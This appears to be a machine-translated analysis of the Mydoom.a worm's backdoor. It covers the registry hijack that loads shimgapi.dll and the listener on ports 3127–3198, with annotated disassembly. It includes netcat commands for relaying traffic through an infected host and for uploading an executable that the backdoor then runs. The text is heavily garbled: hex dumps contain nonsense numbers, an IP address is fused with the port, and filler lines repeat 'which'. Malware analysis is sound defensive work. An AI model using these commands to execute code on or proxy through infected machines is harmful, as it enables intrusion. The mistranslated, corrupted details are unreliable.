The Mydoom.a back door is by the dll form existence, through the revision registration table corresponding key value, increase own to the resource management advancement space in.
In the normal condition, the registration table should be this appearance:
HKEY_CLASSES_ROOTCLSID {E6FB5E20-DE35-11CF-9C87-00AA005127ED} InProcServer32
<NO NAME> REG_EXPAND_SZ %SystemRoot%System32webcheck.dll
ThreadingModel REG_SZ Apartment
But Mydoom.a this place %SystemRoot%System32webcheck.dll for will change into own shimgapi.dll.
Tacitly approves in the situation, the shimgapi.dll back door monitors 3,127 ports, if this port is taken, then increases progressively, but is not bigger than 3198.
This back door has provided two functions:
1st, retransmits the proxy as the port
2nd, takes the back door, in the receive procedure passes on and the execution
Related code:
Text:7E1A1C44 sub_7E1A1C44 proc near; DATA XREF: Start+19o
Text:7E1A1C44
Text:7E1A1C44 WSAData = WSAData ptr -190h
Text:7E1A1C44
Text:7E1A1C44 sub esp, 190h
Text:7E1A1C4A push esi
Text:7E1A1C4B push edi
Text:7E1A1C4C call sub_7E1A1A1F
Text:7E1A1C51 lea eax, [ esp+198h+WSAData ]
Text:7E1A1C55 push eax; LpWSAData
Text:7E1A1C56 push 2; WVersionRequested
Text:7E1A1C58 call ds:WSAStartup
Text:7E1A1C5E call Address
Text:7E1A1C63 mov edi, ds:Sleep
Text:7E1A1C69 mov esi, 0C37h; Monitors 3,127 ports
Text:7E1A1C6E
Text:7E1A1C6E loc_7E1A1C6E: ; CODE XREF: Sub_7E1A1C44+50j
Text:7E1A1C6E push 3
Text:7E1A1C70 push esi
Text:7E1A1C71 call sub_7E1A1B52; Bind subroutine
Text:7E1A1C76 pop ecx
Text:7E1A1C77 pop ecx
Text:7E1A1C78 push 400h; DwMilliseconds
Text:7E1A1C7D call edi; Sleep
Text:7E1A1C7F cmp esi, 0C7Eh; The port is not bigger than 3198
Text:7E1A1C85 jle short loc_7E1A1C93
Text:7E1A1C87 push 800h; DwMilliseconds
Text:7E1A1C8C call edi; Sleep
Text:7E1A1C8E mov esi, 0C37h
Text:7E1A1C93
Text:7E1A1C93 loc_7E1A1C93: ; CODE XREF: Sub_7E1A1C44+41j
Text:7E1A1C93 inc esi; If after the port is bigger than 3,198 pieces to reduce 1 again bind
Text:7E1A1C94 jmp short loc_7E1A1C6E
Text:7E1A1C94 sub_7E1A1C44 endp
After 3,127 ports receive the connection, if the recv first character is x04, changes over to the port to retransmit flow --> to judge the second character whether is 0x01 --> takes the 5~8 four characters to take 3, 42 characters as goal IP address --> carries on the connection as goal port --> and retransmits with the current socket data
For example, we to x00x6exc0xa8x01x0b took the bridging order, among, x00x6e is 110 ports, xc0xa8x01x0b is 192.168.1.11.
# printf x04x01x00x6exc0xa8x01x0bx00 | nc 192.168.7.333127
Z includes +OK Microsoft Exchange Server 2,003 POP3 server version 6.5.6944.0 ready.
May see, sent out 192.168.1.11 110 ports the conversations to return. Please note in front of the character which returned has also contained section of data. Again makes the test:
# printf x04x01x00x6exc0xa8x01x0bx00 | nc 192.168.7.333127 | xxd -g 1
0000000: 04 5a 00 6e c0 a8 01 0b 2b 4f 4b 20 4d 696,372 Z.n.... +OK Micr
0000010: 6f 73 6f 6674204578636861 6e 67.652053 million osoft Exchange S
0000020: 657276657220323030332050 4f 503,320 erver 2,003 POP3
0000030: 736572766572207665727369 6f 6e 2,036 server version 6
0000040: 2E 35 2e 36.393434 million 2e 3.020286463 billion 2e 69 6e 5.6944.0
The attempt transmission instruction connection does not exist 98 ports:
# printf x04x01x00x62xc0xa8x01x0bx00 | nc 192.168.7.333127 | xxd -g 1
0000000: 04 5b 0,062 c0 a8 01 0b. [ b....
Very obviously, that section of data express the connection condition. 04 5a expression connects successfully, 04 5b expression connection defeat. Behind was transmits the past the bridging order. This characteristic possibly is the worm author for facilitate own customer end judgement to design.
Related code:
Text:7E1A17F5
Text:7E1A17F5 loc_7E1A17F5: ; CODE XREF: Sub_7E1A17BA+2Bj
Text:7E1A17F5 cmp byte ptr [ ebp-1 ], 4; Compared with the first character is not 0x04
Text:7E1A17F9 push ebx
Text:7E1A17FA jnz loc_7E1A18B7; The first character is not 0x04 changes over to the withdrawal
Text:7E1A1800 xor ebx, ebx
Text:7E1A1802
Text:7E1A1802 loc_7E1A1802: ; CODE XREF: Sub_7E1A17BA+65j
Text:7E1A1802 push 0; Flags
Text:7E1A1804 push 8
Text:7E1A1806 pop eax
Text:7E1A1807 sub eax, ebx
Text:7E1A1809 push eax; Len
Text:7E1A180A lea eax, [ ebp+ebx+buf ]
Text:7E1A180E push eax; Buf
Text:7E1A180F push [ ebp+s ]; S
Text:7E1A1812 call esi; Recv
Text:7E1A1814 test eax, eax
Text:7E1A1816 jl short loc_7E1A1823
Text:7E1A1818 jz short loc_7E1A1825
Text:7E1A181A add ebx, eax
Text:7E1A181C cmp ebx, 8; Compared with the character which receives suffices insufficient 8
Text:7E1A181F jl short loc_7E1A1802; Accepts the character number insufficiently continues recv
Text:7E1A1821 jmp short loc_7E1A1825
Text:7E1A1823; Which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which?
Text:7E1A1823
Text:7E1A1823 loc_7E1A1823: ; CODE XREF: Sub_7E1A17BA+5Cj
Text:7E1A1823 mov ebx, eax
Text:7E1A1825
Text:7E1A1825 loc_7E1A1825: ; CODE XREF: Sub_7E1A17BA+5Ej
Text:7E1A1825; Sub_7E1A17BA+67j
Text:7E1A1825 cmp ebx, 8
Text:7E1A1828 jnz loc_7E1A1907
Text:7E1A182E jmp short loc_7E1A1836
Text:7E1A1830; Which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which?
Text:7E1A1830
Text:7E1A1830 loc_7E1A1830: ; CODE XREF: Sub_7E1A17BA+8Cj
Text:7E1A1830 cmp [ ebp+var_2 ], 0; After 8 characters characters whether are 0x00, in other words has transmitted whether only 8 characters
Text:7E1A1834 jz short loc_7E1A184A
Text:7E1A1836
Text:7E1A1836 loc_7E1A1836: ; CODE XREF: Sub_7E1A17BA+74j
Text:7E1A1836 push 0
Text:7E1A1838 lea eax, [ ebp+var_2 ]
Text:7E1A183B push 1
Text:7E1A183D push eax
Text:7E1A183E push [ ebp+s ]
Text:7E1A1841 call esi
Text:7E1A1843 cmp eax, 1
Text:7E1A1846 jz short loc_7E1A1830
Text:7E1A1848 jmp short loc_7E1A18B7
Text:7E1A184A; Which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which?
Text:7E1A184A
Text:7E1A184A loc_7E1A184A: ; CODE XREF: Sub_7E1A17BA+7Aj
Text:7E1A184A cmp [ ebp+buf ], 4; Judges the first character once more whether is 0x04
Text:7E1A184E jnz short loc_7E1A18B7
Text:7E1A1850 cmp byte ptr [ ebp-0Fh ], 1; Judges the second character whether is 0x01, if is, then continues, is not, then withdraws
Text:7E1A1854 jnz short loc_7E1A18B7
Text:7E1A1856 cmp [ ebp+hostlong ], 0; At the end of judgement four characters (IP) whether entire 0
Text:7E1A185A jz short loc_7E1A187C
Text:7E1A185C push [ ebp+hostlong ]; Hostlong
Text:7E1A185F call ds:htonl
Text:7E1A1865 test eax, 0FFFFFF00h; Whether inspection input IP is 255.255.255.0
Text:7E1A186A jnz short loc_7E1A187C
Text:7E1A186C push [ ebp+s ]
Text:7E1A186F lea ebx, [ ebp+hostlong ]
Text:7E1A1872 call sub_7E1A1664
Text:7E1A1877 test eax, eax
Text:7E1A1879 pop ecx
Text:7E1A187A jnz short loc_7E1A18B7
Text:7E1A187C
Text:7E1A187C loc_7E1A187C: ; CODE XREF: Sub_7E1A17BA+A0j
Text:7E1A187C; Sub_7E1A17BA+B0j
Text:7E1A187C mov ax, [ ebp-0Eh ]; Takes the first two characters, takes the port
Text:7E1A1880 push 6; Protocol
Text:7E1A1882 mov word ptr [ ebp+name.sa_data ], ax
Text:7E1A1886 mov eax, [ ebp+hostlong ]
Text:7E1A1889 push 1; Type
Text:7E1A188B push 2; Af
Text:7E1A188D mov [ ebp+name.sa_family ], 2
Text:7E1A1893 mov dword ptr [ ebp+name.sa_data+2 ], eax
Text:7E1A1896 call ds:socket
Text:7E1A189C cmp eax, 0FFFFFFFFh
Text:7E1A189F mov [ ebp+var_8 ], eax
Text:7E1A18A2 jz short loc_7E1A18B7
Text:7E1A18A4 lea eax, [ ebp+name ]
Text:7E1A18A7 push 10h; Namelen
Text:7E1A18A9 push eax; Name
Text:7E1A18AA push [ ebp+var_8 ]; S
Text:7E1A18AD call ds:connect
Text:7E1A18B3 test eax, eax
Text:7E1A18B5 jz short loc_7E1A18D2
Text:7E1A18B7
Text:7E1A18B7 loc_7E1A18B7: ; CODE XREF: Sub_7E1A17BA+40j
Text:7E1A18B7; Sub_7E1A17BA+8Ej...
Text:7E1A18B7 push 0; Flags
Text:7E1A18B9 lea eax, [ ebp+buf ]
Text:7E1A18BC push 8; Len
Text:7E1A18BE push eax; Buf
Text:7E1A18BF push [ ebp+s ]; S
Text:7E1A18C2 mov [ ebp+buf ], 4
Text:7E1A18C6 mov byte ptr [ ebp-0Fh ], 5Bh; The connection is not successful, returns to 0x5B
Text:7E1A18CA call ds:send
Text:7E1A18D0 jmp short loc_7E1A18F8
Text:7E1A18D2; Which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which?
Text:7E1A18D2
Text:7E1A18D2 loc_7E1A18D2: ; CODE XREF: Sub_7E1A17BA+FBj
Text:7E1A18D2 push 0; Flags
Text:7E1A18D4 lea eax, [ ebp+buf ]
Text:7E1A18D7 push 8; Len
Text:7E1A18D9 push eax; Buf
Text:7E1A18DA push [ ebp+s ]; S
Text:7E1A18DD mov [ ebp+buf ], 4
Text:7E1A18E1 mov byte ptr [ ebp-0Fh ], 5Ah; Connects successfully, returns to 0x5A
Text:7E1A18E5 call ds:send
Text:7E1A18EB push [ ebp+var_8 ]
Text:7E1A18EE push [ ebp+s ]
Text:7E1A18F1 call sub_7E1A16D3
Text:7E1A18F6 pop ecx
Text:7E1A18F7 pop ecx
If the recv 1st character is xQQ --> a 2~5 character is xPPxPPxPPxPP --> accepts all data which starts from the sixth character, took the document preservation after temporary folder --> CreateProcess the --> procedure withdrawal, deletes the procedure.
In other words, so long as we wilfully may the execution file forehead, add on five characters: XQQxPPxPPxPPxPP, transmitted as the data to infected the Mydoom.a worm machine 3,127 ports, this document, could carry out on the system. I the system calculator procedure, have added on with UltraEdit this magic-head, transmitted the past with NC, the success carries out.
# xxd -g 1 -l 64 calc.exe
0000000: Qq pp pp pp pp 4d 5a 900003000000040000.. <. MZ.........
0000010: 00 ff ff 0,000 b8 00000000000000400000............. @..
0000020: 00000000000000000000000000000000................
0000030: 00000000000000000000000000000000................
# nc 192.168.7.333127 < calc.exe
